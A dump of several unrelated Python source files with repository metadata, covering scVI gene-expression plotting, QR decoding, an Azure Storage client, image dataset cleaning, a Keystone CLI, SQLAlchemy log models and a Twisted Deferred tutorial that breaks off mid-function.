color="named_clusters",
show=False,
ax=ax,
legend_fontweight=legend_fontweight,
legend_loc=legend_loc,
size=point_size,
)
fig3.suptitle(title)
fig3.tight_layout(rect=[0, 0.03, 1, 0.95])
title = title.replace(" ", "").replace("=", "_")
if outdir:
fig3.savefig(os.path.join(outdir, "{}.pdf".format(title)))
fig3.savefig(os.path.join(outdir, "{}.png".format(title)))
fig1.show()
fig2.show()
fig3.show()
means_df = []
dropout_df = []
dispersion_df = []
for tensors in scvi_posterior.sequential(batch_size=batch_size):
sample_batch, _, _, batch_index, labels = tensors
outputs = scvi_posterior.model.inference(
sample_batch, batch_index=batch_index, y=labels
)
px_r = outputs["px_r"].detach().cpu().numpy()
px_rate = outputs["px_rate"].detach().cpu().numpy()
px_dropout = outputs["px_dropout"].detach().cpu().numpy()
dropout_df.append(px_dropout)
dispersion_df.append(px_r)
means_df.append(px_rate)
dropout_df = pd.DataFrame(np.vstack(dropout_df))
dispersion_df = pd.DataFrame(np.vstack(dispersion_df))
means_df = pd.DataFrame(np.vstack(means_df))
means_df.index = list(adata.obs_names)
means_df.columns = list(scviDataset.gene_names)
means_df = means_df.T
dropout_df.index = list(adata.obs_names)
dropout_df.columns = list(scviDataset.gene_names)
dropout_df = dropout_df.T
dispersion_df.index = list(adata.obs_names)
dispersion_df.columns = list(scviDataset.gene_names)
dispersion_df = dispersion_df.T
reconst_loss_df = pd.DataFrame(reconst_loss.detach().cpu().numpy())
reconst_loss_df.index = list(adata.obs_names)
reconst_loss_df.columns = list(scviDataset.gene_names)
reconst_loss_df = reconst_loss_df.T
if outdir:
os.makedirs(outdir, exist_ok=True)
means_df.to_csv(
os.path.join(outdir, "SCVI_means_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
dropout_df.to_csv(
os.path.join(outdir, "SCVI_dropout_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
dispersion_df.to_csv(
os.path.join(outdir, "SCVI_dispersions_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
reconst_loss_df.to_csv(
os.path.join(outdir, "SCVI_reconstloss_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
obj_to_return = (
scvi_posterior,
scvi_latent,
scvi_vae,
scvi_trainer,
fig1,
fig2,
fig3,
)
titles_to_return = (
"posterior",
"latent",
"vae",
"trainer",
"cellwise_plot",
"genewise_plot",
"libsize_plot",
)
sct_gene_pars_df = pd.read_csv(sct_gene_pars, sep="\t", index_col=0)
gene_cell_disp_summary_df = pd.DataFrame(
dispersion_df.median(1), columns=["gene_cell_mean_disp"]
)
merged_df = sct_gene_pars_df.join(gene_cell_disp_summary_df).dropna()
fig = plt.figure(figsize=(8, 4))
ax = fig.add_subplot(121)
ax.scatter(
merged_df["gmean"], merged_df["gene_cell_mean_disp"], alpha=0.5, label="Gene"
)
ax.legend(frameon=False)
ax.set_xlabel("Gene gmean")
ax.set_ylabel("SCVI theta")
merged_df = sct_gene_pars_df.join(sct_model_pars_fit_df)
ax = fig.add_subplot(122)
ax.scatter(merged_df["gmean"], merged_df["theta"], alpha=0.5, label="Gene")
ax.legend(frameon=False) # , loc='upper left')
ax.set_xlabel("Gene gmean")
ax.set_ylabel("SCT theta")
title = "{} | ThetaVSGmean | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
fig.suptitle(title)
fig.tight_layout()
title = title.replace(" ", "")
if outdir:
fig.savefig(os.path.join(outdir, "{}.pdf".format(title)))
fig.savefig(os.path.join(outdir, "{}.png".format(title)))
sct_library_sizes = pd.read_csv(sct_cell_pars, sep="\t")
mean_scvi_disp_df = pd.DataFrame(dispersion_df.mean(1), columns=["scvi_dispersion"])
sct_disp_df = pd.read_csv(
sct_cell_pars.replace("_cell_", "_model_"), sep="\t", index_col=0
)
joined_df = sct_disp_df.join(mean_scvi_disp_df)
title = "{} | Dispersion | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
fig4 = plt.figure(figsize=(10, 5))
ax = fig4.add_subplot(121)
ax.scatter(joined_df["theta"], joined_df["scvi_dispersion"], alpha=0.5)
ax.axline([0, 0], [1, 1], color="gray", linestyle="dashed")
ax.set_xlabel("SCT theta")
ax.set_ylabel("scVI theta")
ax = fig4.add_subplot(122)
sc.pl.umap(
adata,
color="named_clusters",
show=False,
ax=ax,
legend_fontweight=legend_fontweight,
legend_loc=legend_loc,
size=point_size,
)
fig4.suptitle(title)
fig4.tight_layout(rect=[0, 0.03, 1, 0.95])
title = title.replace(" ", "").replace("=", "_")
if outdir:
fig4.savefig(os.path.join(outdir, "{}.pdf".format(title)))
fig4.savefig(os.path.join(outdir, "{}.png".format(title)))
return dict(zip(titles_to_return, obj_to_return))
def RunSCVI(
counts_dir,
metadata_file,
sct_cell_pars,
outdir,
title_prefix="",
idents_col="phenoid",
reconstruction_loss="nb",
dispersion="gene-cell",
cell_offset="none",
gene_offset="none",
n_encoder=1,
hvg_genes=3000,
ldvae=False,
ldvae_bias=False,
use_cuda=True,
genes_to_exclude_file=None,
lr=1e-3,
kl_type="reverse",
**kwargs,
):
adata = sc.read_10x_mtx(counts_dir)
metadata = pd.read_csv(metadata_file, sep="\t", index_col=0)
adata.obs["named_clusters"] = metadata[idents_col]
n_epochs = np.min([round((20000 / adata.n_obs) * 400), 400])
sct_model_pars_fit = sct_cell_pars.replace("cell_pars", "model_pars_fit")
sct_gene_pars = sct_cell_pars.replace("cell_pars", "gene_attrs")
if genes_to_exclude_file:
genes_to_exclude_df = pd.read_csv(genes_to_exclude_file, sep="\t", index_col=0)
genes_to_exclude = genes_to_exclude_df.index.tolist()
all_genes = adata.var_names
genes_to_keep = list(set(all_genes).difference(genes_to_exclude))
adata = adata[:, genes_to_keep]
results = RunVAE(
adata,
reconstruction_loss,
linear=ldvae,
title_prefix=title_prefix,
n_encoder=n_encoder,
cell_offset=cell_offset,
gene_offset=gene_offset,
hvg_genes=hvg_genes,
n_epochs=n_epochs,
lr=lr,
dispersion=dispersion,
use_cuda=use_cuda,
sct_cell_pars=sct_cell_pars,
sct_gene_pars=sct_gene_pars,
sct_model_pars_fit=sct_model_pars_fit,
outdir=outdir,
kl_type=kl_type,
**kwargs,
)
return results
|
[
"saketkc@gmail.com"
] |
saketkc@gmail.com
|
448a496d6cf183fe73cf62e90b39b8f5e925a6f8
|
cc1d44cf04e5b2b15bb296a434aad4ae4bcfc4be
|
/python3/qr/zbarlight_test.py
|
5944e63c9ba7fb774948ce49dce2fe4de1a416f1
|
[] |
no_license
|
ericosur/ericosur-snippet
|
dda2200546b13fb9b84632d115a0f4ca5e3d5c47
|
0309eeb614612f9a35843e2f45f4080ae03eaa81
|
refs/heads/main
| 2023-08-08T04:54:05.907435
| 2023-07-25T06:04:01
| 2023-07-25T06:04:01
| 23,057,196
| 2
| 1
| null | 2022-08-31T09:55:19
| 2014-08-18T03:18:52
|
Perl
|
UTF-8
|
Python
| false
| false
| 864
|
py
|
#!/usr/bin/env python3
# coding: utf-8
'''
apt-get install libzbar-dev
pip install zbarlight
I do not recomment use this module to decode qrcode.
'''
import sys
from PIL import Image
import common
try:
import zbarlight
except ImportError:
print('need to install zbarligt (python) and libzbar-dev')
sys.exit(1)
def read_image(fn):
''' read image '''
im = None
with open(fn, "rb") as fin:
im = Image.open(fin)
im.load()
return im
def process():
''' process '''
arr = common.get_pngs()
for fn in arr:
print('fn:', fn)
im = read_image(fn)
codes = zbarlight.scan_codes(['qrcode'], im)
# codes in type 'byte'
for s in codes:
print(s)
print(s.decode('utf-8'))
def main():
''' main '''
process()
if __name__ == '__main__':
main()
|
[
"ericosur@gmail.com"
] |
ericosur@gmail.com
|
ee2c1cb101ed600ef6a59804bd8a60d49f33250a
|
531c47c15b97cbcb263ec86821d7f258c81c0aaf
|
/sdk/storage/azure-mgmt-storage/azure/mgmt/storage/v2019_06_01/aio/_storage_management_client_async.py
|
c4106bd382d3bd7e0ec92066dc1895978266f306
|
[
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later",
"MIT"
] |
permissive
|
YijunXieMS/azure-sdk-for-python
|
be364d3b88204fd3c7d223df23756386ff7a3361
|
f779de8e53dbec033f98f976284e6d9491fd60b3
|
refs/heads/master
| 2021-07-15T18:06:28.748507
| 2020-09-04T15:48:52
| 2020-09-04T15:48:52
| 205,457,088
| 1
| 2
|
MIT
| 2020-06-16T16:38:15
| 2019-08-30T21:08:55
|
Python
|
UTF-8
|
Python
| false
| false
| 8,245
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional, TYPE_CHECKING
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration_async import StorageManagementClientConfiguration
from .operations_async import Operations
from .operations_async import SkusOperations
from .operations_async import StorageAccountsOperations
from .operations_async import UsagesOperations
from .operations_async import ManagementPoliciesOperations
from .operations_async import PrivateEndpointConnectionsOperations
from .operations_async import PrivateLinkResourcesOperations
from .operations_async import ObjectReplicationPoliciesOperations
from .operations_async import EncryptionScopesOperations
from .operations_async import BlobServicesOperations
from .operations_async import BlobContainersOperations
from .operations_async import FileServicesOperations
from .operations_async import FileSharesOperations
from .operations_async import QueueServicesOperations
from .operations_async import QueueOperations
from .operations_async import TableServicesOperations
from .operations_async import TableOperations
from .. import models
class StorageManagementClient(object):
"""The Azure Storage Management API.
:ivar operations: Operations operations
:vartype operations: azure.mgmt.storage.v2019_06_01.aio.operations_async.Operations
:ivar skus: SkusOperations operations
:vartype skus: azure.mgmt.storage.v2019_06_01.aio.operations_async.SkusOperations
:ivar storage_accounts: StorageAccountsOperations operations
:vartype storage_accounts: azure.mgmt.storage.v2019_06_01.aio.operations_async.StorageAccountsOperations
:ivar usages: UsagesOperations operations
:vartype usages: azure.mgmt.storage.v2019_06_01.aio.operations_async.UsagesOperations
:ivar management_policies: ManagementPoliciesOperations operations
:vartype management_policies: azure.mgmt.storage.v2019_06_01.aio.operations_async.ManagementPoliciesOperations
:ivar private_endpoint_connections: PrivateEndpointConnectionsOperations operations
:vartype private_endpoint_connections: azure.mgmt.storage.v2019_06_01.aio.operations_async.PrivateEndpointConnectionsOperations
:ivar private_link_resources: PrivateLinkResourcesOperations operations
:vartype private_link_resources: azure.mgmt.storage.v2019_06_01.aio.operations_async.PrivateLinkResourcesOperations
:ivar object_replication_policies: ObjectReplicationPoliciesOperations operations
:vartype object_replication_policies: azure.mgmt.storage.v2019_06_01.aio.operations_async.ObjectReplicationPoliciesOperations
:ivar encryption_scopes: EncryptionScopesOperations operations
:vartype encryption_scopes: azure.mgmt.storage.v2019_06_01.aio.operations_async.EncryptionScopesOperations
:ivar blob_services: BlobServicesOperations operations
:vartype blob_services: azure.mgmt.storage.v2019_06_01.aio.operations_async.BlobServicesOperations
:ivar blob_containers: BlobContainersOperations operations
:vartype blob_containers: azure.mgmt.storage.v2019_06_01.aio.operations_async.BlobContainersOperations
:ivar file_services: FileServicesOperations operations
:vartype file_services: azure.mgmt.storage.v2019_06_01.aio.operations_async.FileServicesOperations
:ivar file_shares: FileSharesOperations operations
:vartype file_shares: azure.mgmt.storage.v2019_06_01.aio.operations_async.FileSharesOperations
:ivar queue_services: QueueServicesOperations operations
:vartype queue_services: azure.mgmt.storage.v2019_06_01.aio.operations_async.QueueServicesOperations
:ivar queue: QueueOperations operations
:vartype queue: azure.mgmt.storage.v2019_06_01.aio.operations_async.QueueOperations
:ivar table_services: TableServicesOperations operations
:vartype table_services: azure.mgmt.storage.v2019_06_01.aio.operations_async.TableServicesOperations
:ivar table: TableOperations operations
:vartype table: azure.mgmt.storage.v2019_06_01.aio.operations_async.TableOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: The ID of the target subscription.
:type subscription_id: str
:param str base_url: Service URL
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
"""
def __init__(
self,
credential: "AsyncTokenCredential",
subscription_id: str,
base_url: Optional[str] = None,
**kwargs: Any
) -> None:
if not base_url:
base_url = 'https://management.azure.com'
self._config = StorageManagementClientConfiguration(credential, subscription_id, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
self.operations = Operations(
self._client, self._config, self._serialize, self._deserialize)
self.skus = SkusOperations(
self._client, self._config, self._serialize, self._deserialize)
self.storage_accounts = StorageAccountsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.usages = UsagesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.management_policies = ManagementPoliciesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.private_endpoint_connections = PrivateEndpointConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.private_link_resources = PrivateLinkResourcesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.object_replication_policies = ObjectReplicationPoliciesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.encryption_scopes = EncryptionScopesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.blob_services = BlobServicesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.blob_containers = BlobContainersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.file_services = FileServicesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.file_shares = FileSharesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.queue_services = QueueServicesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.queue = QueueOperations(
self._client, self._config, self._serialize, self._deserialize)
self.table_services = TableServicesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.table = TableOperations(
self._client, self._config, self._serialize, self._deserialize)
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "StorageManagementClient":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
|
[
"noreply@github.com"
] |
YijunXieMS.noreply@github.com
|
7acb737859a8d78bd545e2ef6489badd805c62d3
|
0aa3890c840528e517470207e06c1e7e136ecb43
|
/utils/__init__.py
|
524916b4a9d54c9df3eacaa805632b2aea82db06
|
[] |
no_license
|
solinari27/stockCrawler
|
7aa05cd8a7a18a6286b3bf9fd3512f4138b13951
|
4159e53cba2315b052cf37fddcbdb2dee8e9d094
|
refs/heads/master
| 2023-07-24T21:30:34.290533
| 2019-12-12T15:05:58
| 2019-12-12T15:05:58
| 120,918,787
| 0
| 0
| null | 2023-07-06T21:25:19
| 2018-02-09T14:58:31
|
Python
|
UTF-8
|
Python
| false
| false
| 119
|
py
|
#!usr/bin/env python
#-*- coding:utf-8 _*-
"""
@author: solinari
@file: __init__.py.py
@time: 2018/11/04
"""
|
[
"solinari27@gmail.com"
] |
solinari27@gmail.com
|
45667c5a8f2316218249b7697d3dca26d9f8711e
|
ba8583b784301b2206d9cba3f57c4cc1c969165c
|
/src/data/prepare_dataset.py
|
bbf1df11477eddfd9cf35c8325d3ab688d32214b
|
[] |
no_license
|
tonylibing/tf_classification_framework
|
c8cd0c71badf6cd20a2e87711ebbe89f6f9eceba
|
e08f1b9dc7460a147a704ec099c64785663ce070
|
refs/heads/master
| 2022-04-12T16:16:52.809842
| 2020-03-07T13:26:02
| 2020-03-07T13:26:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,541
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 21 14:12:43 2018
A batch verify image tool
After downloading a large amount of image data, usually we find that some
images can not be open, which may be caused by network transmission errors.
Therefore, before using these images, use this tool to verify the image data,
and move the unreadable image to the specified path.
@author: as
"""
import os
import sys
import cv2
import numpy as np
import shutil
import warnings
from PIL import Image
import tensorflow as tf
# raise the warning as an exception
warnings.filterwarnings('error')
from utils.config_utils import load_config_file, mkdir_if_nonexist
flags = tf.app.flags
flags.DEFINE_string('config_path', '', 'path of the config file')
FLAGS = flags.FLAGS
# load config file
config_path = FLAGS.config_path
config_dict = load_config_file(config_path)
sys.stdout.flush()
reshape_size = config_dict['DATASET']['IMAGE_SIZE']
src_dir = config_dict['DATASET']['DATASET_ROOT_DIR']
use_channel_normalization = config_dict['DATASET']['USE_CHANNEL_NORMALIZATION']
output_paras = config_dict['OUTPUT']
experiment_base_dir = os.path.join(output_paras['OUTPUT_SAVE_DIR'], output_paras['EXPERIMENT_NAME'])
model_save_dir = os.path.join(experiment_base_dir, 'weights')
result_save_dir = os.path.join(experiment_base_dir, 'result')
error_save_dir = os.path.join(result_save_dir, 'error_format')
mkdir_if_nonexist(model_save_dir, raise_error=False)
mkdir_if_nonexist(result_save_dir, raise_error=False)
mkdir_if_nonexist(error_save_dir, raise_error=False)
# get datast mean_var file path
mean_var_file = os.path.join(model_save_dir, 'dataset_mean_var.txt')
cnt = 0
rm_cnt = 0
rgb_list = []
for root, dirs, files in os.walk(src_dir):
for file_name in files:
cnt += 1
if cnt % 1000 == 0:
print(cnt)
sys.stdout.flush()
src_file = os.path.join(root, file_name)
dst_file = os.path.join(error_save_dir, file_name)
try:
# check by PIL Image
img_pil = Image.open(src_file)
# check by opencv
img_cv = cv2.imread(src_file)
if type(img_cv) != np.ndarray:
shutil.move(src_file, dst_file)
rm_cnt += 1
print('error when read by cv2!', file_name)
sys.stdout.flush()
continue
# check channel number
shape = img_cv.shape
if len(shape) == 3:
# this image is valid, reshape it
height, width = shape[:2]
if width > height:
height = int(height * reshape_size / width)
width = reshape_size
else:
width = int(width * reshape_size / height)
height = reshape_size
img_reshape = cv2.resize(img_cv, (width, height), interpolation=cv2.INTER_LINEAR)
cv2.imwrite(src_file, img_reshape)
# compute channel mean value
r_mean = np.mean(img_reshape[:,:,2])
g_mean = np.mean(img_reshape[:,:,1])
b_mean = np.mean(img_reshape[:,:,0])
rgb_list.append([r_mean, g_mean, b_mean])
elif len(shape) == 2:
# change channel num to 3
img_bgr = cv2.cvtColor(img_cv, cv2.COLOR_GRAY2BGR)
#img_bgr = cv2.merge((img_cv, img_cv, img_cv))
cv2.imwrite(src_file, img_bgr)
print("change {} from gray to rgb".format(file_name))
sys.stdout.flush()
# compute channel mean value
mean_value = np.mean(img_cv)
rgb_list.append([mean_value, mean_value, mean_value])
else:
shutil.move(src_file, dst_file)
rm_cnt += 1
print('channel number error!', file_name)
sys.stdout.flush()
except Warning:
shutil.move(src_file, dst_file)
rm_cnt += 1
print('A warning raised!', file_name)
sys.stdout.flush()
except:
shutil.move(src_file, dst_file)
#os.remove(src_file)
rm_cnt += 1
print('Error occured!', file_name)
sys.stdout.flush()
if use_channel_normalization == 0:
mean_var_file = os.path.join(model_save_dir, 'dataset_mean_var.txt')
with open(mean_var_file, 'w') as writer:
writer.write("R_mean_std:" + str(128) + ':' + str(128) + '\n')
writer.write("G_mean_std:" + str(128) + ':' + str(128) + '\n')
writer.write("B_mean_std:" + str(128) + ':' + str(128) + '\n')
else:
# compute dataset channel mean and std
rgb_list = np.array(rgb_list)
r_mean = np.mean(rgb_list[:,2])
g_mean = np.mean(rgb_list[:,1])
b_mean = np.mean(rgb_list[:,0])
r_std = np.std(rgb_list[:,2])
g_std = np.std(rgb_list[:,1])
b_std = np.std(rgb_list[:,0])
mean_var_file = os.path.join(model_save_dir, 'dataset_mean_var.txt')
with open(mean_var_file, 'w') as writer:
writer.write("R_mean_std:" + str(r_mean) + ':' + str(r_std) + '\n')
writer.write("G_mean_std:" + str(g_mean) + ':' + str(g_std) + '\n')
writer.write("B_mean_std:" + str(b_mean) + ':' + str(b_std) + '\n')
print('finish')
print("error number {}".format(rm_cnt))
|
[
"anshengmath@163.com"
] |
anshengmath@163.com
|
b24e6f5f4ec62487169653f0ea11233511822384
|
84baad5eae2bd1adb53e71429b17dcb7198e27ab
|
/keystone/keystone/cli.py
|
81fb2af4b2312a5fe763f8a695af31348765835c
|
[
"Apache-2.0"
] |
permissive
|
bopopescu/x7_dep
|
396812eb50f431ab776bc63b8fce5f10f091d221
|
9a216e6fa3abdba1f63f9d36a4947c2a27de2bb7
|
refs/heads/master
| 2022-11-21T20:06:02.235330
| 2012-11-14T15:25:39
| 2012-11-14T15:25:39
| 282,193,462
| 0
| 0
| null | 2020-07-24T10:42:38
| 2020-07-24T10:42:38
| null |
UTF-8
|
Python
| false
| false
| 4,124
|
py
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import json
import sys
import textwrap
from keystone import config
from keystone.common import utils
CONF = config.CONF
CONF.set_usage('%prog COMMAND')
class BaseApp(object):
def __init__(self, argv=None):
self.argv = argv
def run(self):
return self.main()
def missing_param(self, param):
print 'Missing parameter: %s' % param
CONF.print_help()
print_commands(CMDS)
sys.exit(1)
class DbSync(BaseApp):
"""Sync the database."""
name = 'db_sync'
def __init__(self, *args, **kw):
super(DbSync, self).__init__(*args, **kw)
def main(self):
for k in ['identity', 'catalog', 'policy', 'token']:
driver = utils.import_object(getattr(CONF, k).driver)
if hasattr(driver, 'db_sync'):
driver.db_sync()
class ImportLegacy(BaseApp):
"""Import a legacy database."""
name = 'import_legacy'
def __init__(self, *args, **kw):
super(ImportLegacy, self).__init__(*args, **kw)
def main(self):
from keystone.common.sql import legacy
if len(self.argv) < 2:
return self.missing_param('old_db')
old_db = self.argv[1]
migration = legacy.LegacyMigration(old_db)
migration.migrate_all()
class ExportLegacyCatalog(BaseApp):
"""Export the service catalog from a legacy database."""
name = 'export_legacy_catalog'
def __init__(self, *args, **kw):
super(ExportLegacyCatalog, self).__init__(*args, **kw)
def main(self):
from keystone.common.sql import legacy
if len(self.argv) < 2:
return self.missing_param('old_db')
old_db = self.argv[1]
migration = legacy.LegacyMigration(old_db)
print '\n'.join(migration.dump_catalog())
class ImportNovaAuth(BaseApp):
"""Import a dump of nova auth data into keystone."""
name = 'import_nova_auth'
def __init__(self, *args, **kw):
super(ImportNovaAuth, self).__init__(*args, **kw)
def main(self):
from keystone.common.sql import nova
if len(self.argv) < 2:
return self.missing_param('dump_file')
dump_file = self.argv[1]
dump_data = json.loads(open(dump_file).read())
nova.import_auth(dump_data)
CMDS = {'db_sync': DbSync,
'import_legacy': ImportLegacy,
'export_legacy_catalog': ExportLegacyCatalog,
'import_nova_auth': ImportNovaAuth,
}
def print_commands(cmds):
print
print 'Available commands:'
o = []
max_length = max([len(k) for k in cmds]) + 2
for k, cmd in sorted(cmds.iteritems()):
initial_indent = '%s%s: ' % (' ' * (max_length - len(k)), k)
tw = textwrap.TextWrapper(initial_indent=initial_indent,
subsequent_indent=' ' * (max_length + 2),
width=80)
o.extend(tw.wrap(
(cmd.__doc__ and cmd.__doc__ or 'no docs').strip().split('\n')[0]))
print '\n'.join(o)
def run(cmd, args):
return CMDS[cmd](argv=args).run()
def main(argv=None, config_files=None):
CONF.reset()
args = CONF(config_files=config_files, args=argv)
if len(args) < 2:
CONF.print_help()
print_commands(CMDS)
sys.exit(1)
cmd = args[1]
if cmd in CMDS:
return run(cmd, (args[:1] + args[2:]))
else:
print_commands(CMDS)
sys.exit("Unknown command: %s" % cmd)
|
[
"c@c-Latitude-E6410.(none)"
] |
c@c-Latitude-E6410.(none)
|
80fa29ace4588b9060f696b19bc728f82cbc9939
|
149b139871110353d5ec5a34cd99b2d9b03233e0
|
/backend/br/jus/tredf/analysis/backend/model/models.py
|
674f5f5e1615ce32588de17c4b92c3b40dda580e
|
[] |
no_license
|
alisonsilva/python
|
ca9a99700086d724605d286f05045b40713c9b07
|
de7b31e2279c081750e8ad13b04816e122ff253b
|
refs/heads/master
| 2020-03-07T19:14:17.802736
| 2018-04-26T13:47:05
| 2018-04-26T13:47:05
| 127,665,603
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,816
|
py
|
from datetime import datetime
from br.jus.tredf.analysis.backend.conf import db
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(120), index=True, unique=True)
password_hash = db.Column(db.String(128))
posts = db.relationship('Post', backref='author', lazy='dynamic')
def __repr__(self):
return '<User {}>'.format(self.username)
class Post(db.Model):
id = db.Column(db.Integer, primary_key=True)
body = db.Column(db.String(140))
timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
def __repr__(self):
return '<Post {}>'.format(self.body)
class IpAddress(db.Model):
id = db.Column(db.Integer, primary_key=True)
value = db.Column(db.String(20))
log_entries = db.relationship('LogEntry', backref='ip_address', lazy='select')
occurrences = db.relationship('Occurrence', backref='ip_address', lazy='select')
class LogEntry(db.Model):
id = db.Column(db.Integer, primary_key=True)
instant = db.Column(db.DateTime, index=True, default=datetime.utcnow)
request = db.Column(db.String(100))
status = db.Column(db.Integer)
user_agent = db.Column(db.String(255))
ip_addressid = db.Column(db.Integer, db.ForeignKey('ip_address.id'), nullable=False)
class Occurrence(db.Model):
id = db.Column(db.Integer, primary_key=True)
threshold = db.Column(db.Integer)
duration = db.Column(db.String(20))
start_date = db.Column(db.DateTime, default=datetime.utcnow)
comments = db.Column(db.String(255))
qtd_found = db.Column(db.Integer)
ip_addressid = db.Column(db.Integer, db.ForeignKey("ip_address.id"), nullable=False)
|
[
"alisonsilva123@gmail.com"
] |
alisonsilva123@gmail.com
|
77842a6aee9b5ded6310e374e78ec44dfddb45bd
|
d2cb930ed5df0b1b5f7944e00f6f884bf014803d
|
/douban/twisted-demo.py
|
fcf677fc5cecf53c84cde258c7d3baea35271f91
|
[] |
no_license
|
sixDegree/python-scrapy-demo
|
3cae4298b01edab65449cfe9af56b2fa59f4c07d
|
b66530e54156be8c7877f1fc4d497fd497b6fdda
|
refs/heads/master
| 2020-06-17T03:16:23.038061
| 2019-07-08T09:25:15
| 2019-07-08T09:25:15
| 195,777,787
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,184
|
py
|
from twisted.internet import reactor # 事件循环(自动终止条件:所有socket都已移除)
from twisted.internet import defer # defer.Deferred 特殊的socket对象(需手动调用执行,手动移除)
from twisted.internet import task
import treq # 用于发送异步Request,返回Deferred对象
import time
# 延迟机制:
# Deferred 延迟对象,代表的是一个无法立即获取的值
def demo_defer1():
d = defer.Deferred()
print("called:", d.called) # False
print("call...")
d.callback("Hello")
print("called:", d.called) # True
print("result:", d.result) # Hello
def demo_defer2():
def done(v):
print("done called")
return "Hello " + v
d = defer.Deferred()
d.addCallback(done)
print("called:", d.called) # False
print("call...")
d.callback("Tom")
print("called:", d.called) # True
print("result:", d.result) # Hello Tom
def demo_defer3():
def status(*ds):
return [(getattr(d, 'result', 'N/A'), len(d.callbacks)) for d in ds]
def b_callback(arg):
print("b_callback called with arg =", arg)
return b
def on_done(arg):
print("on_done called with arg =", arg)
return arg
a = defer.Deferred()
b = defer.Deferred()
a.addCallback(b_callback).addCallback(on_done)
print(status(a, b)) # [('N/A', 2), ('N/A', 0)]
a.callback(3) # b_callback called with arg = 3
print(status(a, b)) # [(<Deferred at 0x1047a0da0>, 1), ('N/A', 1)]
b.callback(4) # on_done called with arg = 4
print(status(a, b)) # [(4, 0), (None, 0)]
def demo_defer4():
def status(*ds):
return [(getattr(d, 'result', 'N/A'), len(d.callbacks)) for d in ds]
def b_callback(arg):
print("b_callback called with arg =", arg)
return b
def on_done(arg):
print("on_done called with arg =", arg)
return arg
a = defer.Deferred()
b = defer.Deferred()
a.addCallback(b_callback).addCallback(on_done)
print(status(a, b)) # [('N/A', 2), ('N/A', 0)]
b.callback(4)
print(status(a, b)) # [('N/A', 2), (4, 0)]
a.callback(3) # b_callback called with arg = 3
# on_done called with arg = 4
print(status(a, b)) # [(4, 0), (None, 0)]
def demo_defer5():
def on_done(arg):
print("on_done called with arg =", arg)
return arg
dfds = [defer.Deferred() for i in range(5)]
defer.DeferredList(dfds).addCallback(on_done)
for i in range(5):
dfds[i].callback(i)
# on_done called with arg = [(True, 0), (True, 1), (True, 2), (True, 3), (True, 4)]
# on_done 要等到列表中所有延迟都触发(调用`callback(...)`)后调用
def demo_reactor1():
def done(arg):
print("Done", arg)
def defer_task():
print("Start")
d = defer.Deferred()
time.sleep(3)
d.callback("123")
return d
def stop():
reactor.stop()
defer_task().addCallback(done)
reactor.callLater(0, stop)
reactor.run()
def demo_reactor2():
def done(arg):
print("Done", arg)
def all_done(arg):
print("All done", arg)
def defer_task(i):
print("Start", i)
d = defer.Deferred()
d.addCallback(done)
time.sleep(2)
d.callback(i)
return d
def stop():
print("Stop reactor")
reactor.stop()
dfds = defer.DeferredList([defer_task(i) for i in range(5)])
dfds.addCallback(all_done)
reactor.callLater(0, stop)
reactor.run()
def demo_reactor3():
def done(arg):
